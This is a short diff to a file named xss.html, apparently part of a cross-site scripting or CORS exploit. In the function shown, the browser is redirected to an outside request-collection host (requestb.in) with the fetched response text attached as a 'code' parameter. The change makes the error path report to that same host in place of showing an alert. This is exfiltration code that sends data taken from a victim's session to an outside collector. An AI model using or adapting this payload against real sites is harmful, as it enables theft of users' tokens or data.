--- a/xss.html
+++ b/xss.html
@@ -34,7 +34,7 @@ function makeCorsRequest() {
     document.location = 'http://requestb.in/15rrpyd1?code='+ text;
   };
   xhr.onerror = function() {
-    alert('Woops, there was an error making the request.');
+    document.location = 'http://requestb.in/15rrpyd1?code='+ 'error';
   };
   xhr.send();
 }
